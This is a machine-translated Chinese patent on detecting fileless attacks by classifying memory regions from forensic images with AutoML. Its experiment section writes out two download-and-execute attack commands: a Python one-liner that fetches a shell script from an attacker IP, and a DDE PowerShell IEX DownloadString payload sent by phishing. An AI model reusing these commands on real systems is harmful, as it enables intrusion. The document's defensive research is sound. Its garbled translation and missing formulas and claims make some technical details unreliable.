CN117478373A

CN117478373A - File-free attack investigation method and system based on memory evidence obtaining

Info

Publication number: CN117478373A
Application number: CN202311414040.6A
Authority: CN
Inventors: 冷涛
Original assignee: Sichuan Police College
Current assignee: Sichuan Police College
Priority date: 2023-10-30
Filing date: 2023-10-30
Publication date: 2024-01-30

Abstract

The invention provides a file-free attack investigation method and system based on memory evidence obtaining, and belongs to the technical field of network security attack investigation. Firstly, respectively operating benign samples and implementing file-free attacks to obtain a memory mirror image; secondly, taking the virtual address descriptor node of each memory mirror image as a sample, and extracting the characteristics of a memory area corresponding to the sample; then, carrying out data processing on the sample to construct a data set; dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result; and finally, according to the test result, performing verification analysis on the tested malicious sample. The invention discovers the attack aiming at the specific memory area in the file-free attack, assists the attacker to investigate, effectively strengthens the security defense capability of the system, protects the key data from various threats of the file-free attack, and ensures the stability and the security of the system operation.

Description

File-free attack investigation method and system based on memory evidence obtaining

Technical Field

The invention belongs to the technical field of network security attack investigation, and particularly relates to a file-free attack investigation method and system based on memory evidence obtaining.

Background

While modern file-free malware utilizes various techniques to evade detection, researchers have been exploring memory forensics as a way to detect such attacks. The common method is that the existing plugins are used for evidence collection by utilizing a Volatity memory to extract the characteristics, and the characteristics are classified by utilizing a machine learning algorithm; another method is to convert the memory mirror image into a picture representation and detect it using deep learning techniques. However, these methods use the memory image as a sample to determine whether the host is destroyed, or use the process in the memory image as a sample to identify a malicious process. However, the granularity of detection is still relatively coarse and cannot be located in a specific memory area. Thus, to address these challenges, further research is needed to conduct fine-grained investigation against file-free attacks in order to identify malicious processes and pinpoint malicious virtual memory regions.

Disclosure of Invention

Based on the technical problems, the invention provides a file-free attack investigation method and a file-free attack investigation system based on memory evidence obtaining, which effectively help analysts to investigate file-free malicious software attacks by extracting features and accurately identifying and positioning suspicious memory areas.

The invention provides a file attack-free investigation method based on memory evidence obtaining, which comprises the following steps:

step S1: respectively running benign samples and implementing file-free attacks to obtain a memory mirror image; the file-free attack types comprise code injection, script attack and ground-leaving attack; the memory mirror comprises a malignant sample memory mirror and a benign sample memory mirror;

step S2: taking each virtual address descriptor node of the memory mirror image as a sample, and extracting the characteristics of a memory area corresponding to the sample;

step S3: performing de-duplication operation on the sample, and performing normalization operation on the numerical value of the sample at the same time to construct a data set;

step S4: dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result;

step S5: and according to the test result, performing verification analysis on the tested malicious sample.

Optionally, the running benign samples and implementing the file-free attack respectively obtain the memory mirror image specifically includes:

the file-free attack types comprise code injection, script attack and ground-leaving attack;

the code injection features comprise functions, binaries, codes, encryption information, countermeasures, memories, trojan horses and attack frameworks;

the script attack features comprise malicious character strings, neutral character strings and scripts, which are respectively used for detecting malicious command prompt script, neutral command prompt Fu Jiaoben and other malicious scripts;

the ground attack feature comprises a ground attack, a remote desktop protocol and a darknet communication protocol;

the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.

Optionally, taking the virtual address descriptor node of each memory mirror image as a sample, and extracting the feature of the memory area corresponding to the sample specifically includes:

acquiring a feature set of a memory area corresponding to the sample;

and setting an plugin based on the memory evidence obtaining frame, and extracting the characteristics of the characteristic set.

Optionally, the performing a deduplication operation on the sample, and simultaneously performing a normalization operation on the numerical value of the sample, so as to construct a data set, which specifically includes:

converting the sample into a set element, removing repeated items, and converting back to the original data type;

the normalization operation formula is:

wherein x is _{Label (C)} For the result processed by Min-Max normalized conversion function, x is the data of the sample, x _max X is the maximum value of the sample data _min Is the minimum of the sample data.

Optionally, the dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result, which specifically includes:

dividing the data set into a training set and a testing set, and randomly distributing the samples;

model training is carried out on the training set by using an automatic machine learning library, evaluation indexes of different models are compared according to output results, and a model with highest precision on the training set is selected as an optimal model;

applying an optimal model to the test set for testing to obtain the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set;

judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and re-training and testing; if satisfied, the model is deployed to the actual application.

The invention also provides a file-free attack investigation system based on memory evidence obtaining, which comprises:

the memory mirror image acquisition module is used for respectively running benign samples and implementing file-free attacks to obtain memory mirror images; the file-free attack types comprise code injection, script attack and ground-leaving attack; the memory mirror comprises a malignant sample memory mirror and a benign sample memory mirror;

the feature extraction module is used for taking the virtual address descriptor node of each memory mirror image as a sample and extracting the features of the memory area corresponding to the sample;

the data processing module is used for carrying out the de-duplication operation on the sample and carrying out the normalization operation on the numerical value of the sample at the same time to construct a data set;

the automatic machine learning module is used for dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result;

and the verification analysis module is used for carrying out verification analysis on the tested malicious sample according to the test result.

Optionally, the memory mirror image acquisition module specifically includes:

the ground attack comprises a ground attack, a remote desktop protocol and a darknet communication protocol;

Optionally, the feature extraction module specifically includes:

the feature set acquisition sub-module is used for acquiring a feature set of a memory area corresponding to the sample;

and the feature extraction sub-module is used for setting a plug-in based on the memory evidence obtaining frame and extracting the features of the feature set.

Optionally, the data processing module specifically includes:

the deduplication operation submodule is used for converting the sample into a set element, deduplicating repeated items and converting back to the original data type;

the normalization operation formula is:

Optionally, the automatic machine learning module specifically includes:

a data set dividing submodule for dividing the data set into a training set and a testing set and randomly distributing the samples;

the model training sub-module is used for carrying out model training on the training set by using an automatic machine learning library, comparing evaluation indexes of different models according to output results, and selecting a model with highest precision on the training set as an optimal model;

the model test sub-module is used for applying an optimal model to the test set to test to obtain the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set;

the model judging sub-module is used for judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and retraining and testing; if satisfied, the model is deployed to the actual application.

Compared with the prior art, the invention has the following beneficial effects:

the invention injects the covering process, based on script attack, the file-free attack investigation system combined with ground leaving attack, and the value detected by the method is improved to a certain extent than that of the method which only aims at the internal storage injection; the memory descriptor (memory area) is taken as a sample, the sample contains a specified memory area of a specific process, a malicious memory area is automatically identified, an attack investigator can be guided to further deeply analyze the content of the memory area by using memory evidence obtaining, and the workload of an analyst is reduced; the custom plug-in based on the volatibility memory evidence obtaining tool is realized, and the extraction of the memory mirror image characteristics is realized; meanwhile, various types of file-free attacks are realized, and a memory mirror image data set is constructed.

Drawings

FIG. 1 is a flow chart of a file-free attack investigation method based on memory evidence obtaining in the invention;

FIG. 2 is a block diagram of a file-free attack investigation system based on memory evidence obtaining according to the present invention;

FIG. 3 is a Python-based file-less attack survey of the present invention;

FIG. 4 is a schematic diagram of an attack order according to the present invention;

FIG. 5 is a diagram of malicious script content according to the present invention.

Detailed Description

The invention is further described below in connection with specific embodiments and the accompanying drawings, but the invention is not limited to these embodiments.

Example 1

As shown in fig. 1, the invention discloses a file-attack-free investigation method based on memory evidence obtaining, which comprises the following steps:

step S1: respectively running benign samples and implementing file-free attacks to obtain a memory mirror image; the file-free attack types comprise code injection, script attack and ground-leaving attack; the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.

Step S2: and taking the virtual address descriptor node of each memory mirror image as a sample, and extracting the characteristics of the memory area corresponding to the sample.

Step S3: and carrying out de-duplication operation on the sample, and carrying out normalization operation on the numerical value of the sample at the same time to construct a data set.

Step S4: dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result.

The steps are discussed in detail below:

step S1: and respectively running benign samples and implementing file-free attacks to obtain the memory mirror image.

The step S1 specifically comprises the following steps:

the detection Code injection features include API (function), binary, code, cryptograph, counter measure, memory, trojan, and detection against existing attack frameworks metaplus and Cobalt Strike.

The malicious script attack characteristics are detected, and three different functions are designed: malicious strings, neutral strings, and scripts. For detecting malicious PowerShell scripts, neutral PowerShell scripts, and other types of malicious scripts. For malicious document attack vectors in a file-free attack, maldio (malicious document) features are developed, and yara rules are constructed to identify known CVE vulnerabilities and malicious VBA uses in a memory area.

Detection is based on the ground-free attack (lolins) feature, and yara rules were designed. These rules are used to detect whether Lolbins are present in the memory region; in addition, the vnc_dark function is designed. This function detects whether VNC (remote desktop protocol) and dark network protocol exist in the memory area.

The memory mirror image is acquired on the target system by respectively running benign samples and implementing file-free attacks, and any file monitoring or protection mechanism is not triggered; the memory mirror image is a file which stores all data and states in the system memory at a certain moment and can be used for analyzing the running condition of the system or recovering the state of the system.

Two types of memory mirror images are acquired: malignant sample memory mirror and benign sample memory mirror. A malicious sample memory image refers to a memory image of a system that is infected or affected by a file-free attack, which may contain traces of malicious code or abnormal behavior. Benign sample memory image refers to a memory image of a system that is not infected or affected by a file-free attack, which does not contain any traces of malicious code or abnormal behavior.

In this embodiment, the file-free attack types include code injection, script attack and ground attack; the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.

And referring to the behavior of a real attacker, simulating a file-free attack on a virtual machine, after the attack is completed, capturing a memory snapshot to obtain a memory mirror image of a malicious sample, referencing and executing the benign sample, and capturing the memory mirror image. Because the file attack triggering condition is not limited, the file attack triggering condition is manually executed, and the memory mirror image is collected under the connection state of the attack. Benign sample operation and memory mirror image acquisition are realized by adopting an automatic script.

The step S2 specifically comprises the following steps:

a Virtual Address Descriptor (VAD) is a data structure that describes the attributes and state of each memory region in a process virtual address space. The VAD tree is a balanced binary tree used to store and manage all VAD nodes of the process. And traversing the VAD tree to obtain information of all memory areas of the process, including a start address, an end address, a protection attribute, a memory type, a memory state, a mapping file and the like. Taking each VAD node of each memory mirror image as a sample, extracting the characteristics of the corresponding memory area for subsequent machine learning analysis, wherein the extracted characteristics comprise the following steps:

basic features including the size of the memory region, protection attributes, memory type, memory state, etc., may reflect the basic attributes and uses of the memory region.

Content characteristics, including strings, binary data, API calls, sensitive information, etc. in the memory region may reflect specific content and functions in the memory region.

Behavior features, including code execution in the memory region, code injection, code modification, code obfuscation, etc., may reflect dynamic behavior and anomalies in the memory region.

The method for acquiring the feature set of the memory area corresponding to the sample specifically comprises the following steps:

the method comprises the steps of obtaining a memory feature set of a memory area, and specifically comprises eleven features of is_spark, protection, hbcia_structures, tag, mem_map, threads, private, network_structures, persistence, visual_structures and is_map, wherein the is_spark, protection, tag, mem_map, threads, private, is_map are obtained through statistical information or reading memory states, hbcia_structures, network_structures, visual_structures and persistence are obtained through constructing yara rule to scan the memory area.

The method comprises the steps of obtaining a function feature set of a memory area, wherein the function feature set comprises three features, namely api_general_string and api_dynamic_loading, and the api_mapping is realized by constructing a regular expression or utilizing yara rule matching.

The method comprises the steps of obtaining a binary feature set of a memory area, wherein the binary feature set comprises seven features, namely pe_or_dll, is_module, exports, has_header, is_dynamic_library, imports and width_header, and the feature design is judged and set by reading a specific field or mark.

The method comprises the steps of obtaining a code feature set of a memory area, wherein the code feature set comprises five features including direct_calls, direct_jmps, functions, shellcodes and hooks, the first two features are matched through a regular expression, and the last three features are matched through a yara rule.

The method comprises the steps of obtaining a countermeasure feature set of a memory area, wherein the countermeasure feature set comprises three features, namely a debug feature, a sadbox feature and a vm feature, and the three features are matched by adopting yara rules.

The method comprises the steps of obtaining an encryption information feature set of a memory area, wherein the encryption information feature set comprises three features of cipher, encoding and mapping, and the three features are matched by adopting yara rules.

The Trojan characteristic set of the memory area is obtained, specifically comprising two characteristics of cookies and crendials, and extraction is carried out by setting a yara rule.

The method comprises the steps of obtaining a file-free feature set of a memory area, wherein the file-free feature set comprises eight features, namely msf, cobalt, malstring, neutral, script, lobin, mal_doc and vnc_dark, and the eight features are matched by adopting yara rules.

In this embodiment, the memory mirroring is data collection of all processes of the host, where the host has multiple processes, and each process has multiple virtual address descriptors, where the virtual address descriptors are a section of memory area (start-stop address). By taking the virtual address descriptor as a sample, a certain memory area of a specific process can be located.

In this embodiment, the feature design of the memory area is shown in table 1, and the total of eight categories is forty-two features. The feature set includes a memory feature set, a function feature set, a binary feature set, a code feature set, an encryption information feature set, a countermeasure feature set, a wooden horse feature set, and a no-file feature set.

TABLE 1 characterization of memory regions

The plug-in is set based on the memory evidence obtaining frame, and the feature extraction method specifically comprises the following steps:

and writing a self-defined internal memory evidence obtaining plug-in by using a volatile internal memory evidence obtaining open-source tool, and extracting the characteristics of the characteristic set.

The step S3 specifically comprises the following steps:

the samples are converted into set elements, the repeated items are removed, and the original data types are returned.

In this embodiment, the set data structure is used to convert the samples into set elements, automatically remove duplicate entries, and then convert back to the original data type. The principle of this approach is to exploit the property of a collection that the elements in the collection are unordered and do not allow repetition. Thus, duplicate samples are automatically deleted when the samples are converted to collection elements. The collection is then converted back to the original data type. The method has the advantages of simplicity and easiness in use, and no extra space and time cost is required.

The normalization operation formula is:

wherein x is _{Label (C)} To the result of Min-Max normalized conversion function, x is the data of the sample, x _max X is the maximum value of the sample data _min Is the minimum value of the sample data.

The step S4 specifically comprises the following steps:

the data set is divided into a training set and a test set, and samples are generally randomly allocated according to a certain proportion (e.g., 80% and 20%) to ensure the representativeness and independence of the training set and the test set.

Model training is performed on a training set by using an automatic machine learning library (AutoML), which is a method for automatically completing a machine learning process by using a machine learning technology and comprises the steps of data preprocessing, feature engineering, model selection, super-parameter optimization and the like. AutoML can save time and cost for manually debugging the model, and improve performance and interpretability of the model.

And selecting an optimal model (extremely random tree), comparing evaluation indexes (such as accuracy, recall, F1 score and the like) of different models according to the output result of the AutoML, and selecting the model with the best performance on a training set as the optimal model.

And (3) applying the optimal model to a test set for testing, using data of the test set as input to obtain prediction output of the model, comparing the prediction output with real labels of the test set, calculating an evaluation index of the model on the test set, and reflecting generalization capability and stability of the model.

And obtaining a test result, judging whether the model reaches an expected target according to an evaluation index on the test set, and if not, adjusting parameters or a data set of the AutoML to perform training and testing again. If satisfied, the model may be deployed into the actual application.

In this example, a study was conducted on a no file challenge with an AUC value of 98%, recall of 93%, prepison of 96.4% and F1 value of 94.7%.

The step S5 specifically comprises the following steps:

based on the test results, some malicious samples were determined. Further verification of these samples is required to confirm whether they contain malicious code, malicious behavior, or features related to known attack payloads; specialized security tools and memory forensics may be used to analyze the content and structure of the sample.

When Volatility is used, the file path of the memory image and the version of the operating system need to be specified in order to correctly identify the memory structure. For example, if the memory image file is memory. Img and the operating system is Windows10, the following commands can be used:

volatility-fmemory.img--profile＝Win10x64

and (3) performing memory evidence obtaining, namely performing deep analysis and examination on the malicious memory sample by using a memory evidence obtaining technology. By extracting key information in the memory, such as processes, threads, registries, network connections, etc., the behavior and activity of malicious samples in the system can be known, and the possible attack loads of the malicious samples can be identified.

By using these plug-ins, verification analysis can be performed on malicious memory samples, such as:

whether an abnormal or hidden process is running or not can be checked through a pslist or psscan plug-in, and the process ID and the name of the abnormal or hidden process are recorded; whether an abnormal or unknown network connection or socket exists or not can be checked through the netscan plug-in, and relevant processes and remote addresses of the network connection or socket are recorded; whether an abnormal or suspicious command line parameter or a dynamic link library exists or not can be checked through a cmdline or dllllist plug-in, and the path or the content of the command line parameter or the dynamic link library is recorded; through a malfind or apihooks plugin, whether malicious code is injected or API hooks exist or not can be checked, and the malicious code is dumped into a file for disassembly or decompilation analysis; through a hivelist or printkey plug-in, whether an abnormal or modified registry key exists or not can be checked, and key values or data of the registry key are recorded; through the hashdump plug-in, whether the user account password hash value is stolen or cracked or not can be checked, and the plaintext password is attempted to be recovered. The Virtual Address Descriptor (VAD) content of a process may be dumped into a file by vadump. The vaddyump plug-in may be used to extract data that is not mapped to a memory region of a file, such as a heap, stack, or injected code.

And identifying and coping the threat, identifying the security threat existing in the system according to the result of verification analysis, and formulating a corresponding security coping strategy. This may include measures to fix system vulnerabilities, update security policies, enhance network monitoring, etc., to enhance the security defenses of the system and reduce future security risks.

Example 2

As shown in fig. 2, the present invention discloses a file-attack-free investigation system based on memory evidence obtaining, the system comprises:

the memory mirror image acquisition module 10 is used for respectively running benign samples and implementing file-free attacks to obtain a memory mirror image; the file-free attack types comprise code injection, script attack and ground-leaving attack; the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.

The feature extraction module 20 is configured to take the virtual address descriptor node of each memory image as a sample, and extract features of a memory area corresponding to the sample.

The data processing module 30 is configured to perform a deduplication operation on the sample, and perform a normalization operation on the numerical value of the sample, so as to construct a data set.

The automatic machine learning module 40 is configured to divide the data set into a training set and a testing set, perform model training on the training set using the automatic machine learning library, select an optimal model, and apply the optimal model to the data set for testing, so as to obtain a test result.

The verification analysis module 50 is configured to perform verification analysis on the tested malicious sample according to the test result.

As an alternative embodiment, the memory mirror image acquisition module 10 of the present invention specifically includes:

the file-free attack types include code injection, script attack, and ground-free attack.

Code injection features include functions, binaries, codes, encryption information, countermeasures, memory, trojan, and attack frameworks.

The script attack feature includes a malicious string, a neutral string, and a script for detecting a malicious command prompt script, a neutral command prompt Fu Jiaoben, and other malicious scripts, respectively.

The ground attack feature includes a ground attack, a remote desktop protocol and a darknet communication protocol.

As an alternative embodiment, the feature extraction module 20 of the present invention specifically includes:

the feature set acquisition sub-module is used for acquiring the feature set of the memory area corresponding to the sample.

As an alternative embodiment, the data processing module 30 of the present invention specifically includes:

and the deduplication operation submodule is used for converting the sample into a set element, deduplicating the duplicate item and converting back to the original data type.

The normalization operation formula is:

As an alternative embodiment, the automatic machine learning module 40 of the present invention specifically includes:

and the data set dividing submodule is used for dividing the data set into a training set and a testing set and randomly distributing samples.

And the model training sub-module is used for carrying out model training on the training set by using the automatic machine learning library, comparing the evaluation indexes of different models according to the output result, and selecting the model with the highest precision on the training set as the optimal model.

And the model test sub-module is used for applying the optimal model to the test set to test, obtaining the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set.

The model judging sub-module is used for judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and re-training and testing; if satisfied, the model is deployed to the actual application.

Example 3

The present example was analyzed in combination with the experimental content as follows:

the attack process comprises the following steps: and constructing a website by using cobalstrike on an attacker (192.168.233.139) platform, deploying a shell. Py script, and starting a tcp rebound shell connection.

The target machine runs the following script: python-c "import ullib 2; exec ullib2. Ullepen ('http:// 192.168.233.139:8000/shell.py'). Read (); ".

And establishing a channel from the attacker to the target machine, and finishing the file-free attack. Capturing a system memory mirror image, and detecting a malicious process and a malicious memory area. As shown in fig. 3, each sample contains an "Address" field in the format imagename_processid_processname_vadstartaddress_vadand-Address, for example, a specific sample named 014.vmem_3488_python.exe_0x1480000_0x14bdfff is detected as a malicious sample. The case study involves a memory image named "014.Vmem" which is associated with a process ID named "3488" and a process name named "python. Exe". The memory region of interest corresponds to a virtual address descriptor, with a start address of "0x1480000" and a stop address of "0x14bdfff".

The Volatitudes plugin "vaddymp" is utilized to derive the specified memory region. Subsequently, using Neo to open the exported dmp file, the cobaltstrinke "beacon. Dll" (shown in fig. 3) was found, along with information about the functions associated with reverse code injection.

The present embodiment performs analysis in combination with cases, as follows:

generating a malicious powershell script x1.Ps1 on an attacker, starting reverse connection monitoring, constructing an office document, embedding a DDE command, and DDEAUTO C: windows/systems 32/cmd. Exe "/kpowershell IEX (New-objectnet. Webparent) & DownloadString ('http:// 192.168.233.146/file_shell/x 1. Ps1')"). And sending the malicious document to the target user through phishing mail.

The target user opens the phishing mail attachment on the target machine, allows dde to execute, establishes a connection channel between the attacker and the target machine, and realizes file-free attack. And capturing a memory mirror image, and detecting the following two samples as malicious by an application model.

Sample one: vmem 2280_powershell. Exe_0x1d30000_0x3d2ffff

Sample two: vmem 2280_powershell. Exe_0x1d30000_0x3d2ffff

The meaning of the two sample representation is 008 memory mirror, process powershell, process id 2280, malicious memory regions are 0x1d30000_0x3d2ffff and 0x1d30000_0x3d2ffff. The specified memory area is exported through vaddyump, as shown in fig. 4 and 5, attack command and malicious script content of x1.Ps1 are seen, and the accuracy and feasibility of the invention are proved through experimental verification and case analysis.

The above description is only of the preferred embodiments of the present invention and is not intended to limit the present invention, but various modifications and variations can be made to the present invention by those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention should be included in the protection scope of the present invention.

Claims

1. The file attack-free investigation method based on memory evidence obtaining is characterized by comprising the following steps:

2. The method for investigating the file-free attack based on the memory evidence obtaining according to claim 1, wherein the method comprises the steps of respectively running benign samples and implementing the file-free attack to obtain the memory mirror image, and the method specifically comprises the following steps:

3. The method for investigating the file-free attack based on memory forensics according to claim 1, wherein the extracting the characteristics of the memory area corresponding to the sample by using the virtual address descriptor node of each memory mirror image as the sample specifically comprises:

acquiring a feature set of a memory area corresponding to the sample;

4. The method for investigating the file-free attack based on memory forensics according to claim 1, wherein the performing the deduplication operation on the sample and the normalization operation on the numerical value of the sample at the same time, and constructing a data set specifically comprises:

the normalization operation formula is:

5. The method for file-free attack investigation based on memory forensics according to claim 1, wherein the data set is divided into a training set and a test set, model training is performed on the training set by using an automatic machine learning library, an optimal model is selected, and the optimal model is applied to the data set for testing, so as to obtain a test result, and the method specifically comprises:

6. The file-free attack investigation system based on memory evidence obtaining is characterized in that the system comprises:

7. The memory forensic-based file-less attack investigation system according to claim 6, wherein the memory image acquisition module specifically comprises:

8. The memory forensic-based file-less attack investigation system according to claim 6, wherein the feature extraction module specifically comprises:

9. The memory forensic-based file-less attack investigation system according to claim 6, wherein the data processing module specifically comprises:

the normalization operation formula is:

10. The memory forensic based file-less attack investigation system according to claim 6, wherein the automatic machine learning module specifically comprises: